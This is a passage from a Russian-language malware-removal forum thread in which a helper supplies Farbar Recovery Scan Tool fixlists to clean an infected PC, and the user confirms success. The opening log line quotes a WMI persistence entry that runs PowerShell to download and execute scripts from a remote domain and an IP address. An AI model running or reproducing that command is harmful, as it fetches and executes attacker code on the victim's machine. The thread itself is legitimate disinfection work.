WMI:subscription\CommandLineEventConsumer->fuckamm4::[CommandLineTemplate => cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http: (the data entry has 797 more characters).] <==== ATTENTION
  • Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
  • Обратите внимание, что компьютер будет перезагружен.
  • Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму
 
 
Сделайте новые логи FRST.

 

Fixlog.txt

Addition.txt

FRST.txt

Ссылка на сообщение
Поделиться на другие сайты
ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!


  • Временно выгрузите антивирус, файрволл и прочее защитное ПО


  • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:



CreateRestorePoint:
CloseProcesses:
Task: {6A1EFD69-F39E-423B-8D1A-38CC263EB9CF} - \oka -> No File <==== ATTENTION
2020-01-06 20:37 - 2020-01-06 20:49 - 000000079 _____ C:\Windows\system32\ps
2020-01-06 20:37 - 2020-01-06 20:48 - 000000081 _____ C:\Windows\system32\s
2020-01-06 20:37 - 2020-01-06 20:48 - 000000077 _____ C:\Windows\system32\p
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File



  • Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!


  • Обратите внимание, что компьютер будет перезагружен.


  • Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму

 

 

Пробуйте установить антивирус. 

Ссылка на сообщение
Поделиться на другие сайты

 

ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!
  • Временно выгрузите антивирус, файрволл и прочее защитное ПО
  • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
CreateRestorePoint:
CloseProcesses:
Task: {6A1EFD69-F39E-423B-8D1A-38CC263EB9CF} - \oka -> No File <==== ATTENTION
2020-01-06 20:37 - 2020-01-06 20:49 - 000000079 _____ C:\Windows\system32\ps
2020-01-06 20:37 - 2020-01-06 20:48 - 000000081 _____ C:\Windows\system32\s
2020-01-06 20:37 - 2020-01-06 20:48 - 000000077 _____ C:\Windows\system32\p
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
  • Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
  • Обратите внимание, что компьютер будет перезагружен.
  • Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму
 
 
Пробуйте установить антивирус. 

 

Теперь все отлично, тормоза пропали. Антивирь встал нормально. Благодарю за помощь.+ в карму.

Ссылка на сообщение
Поделиться на другие сайты
Гость
Эта тема закрыта для публикации ответов.
×
×
  • Создать...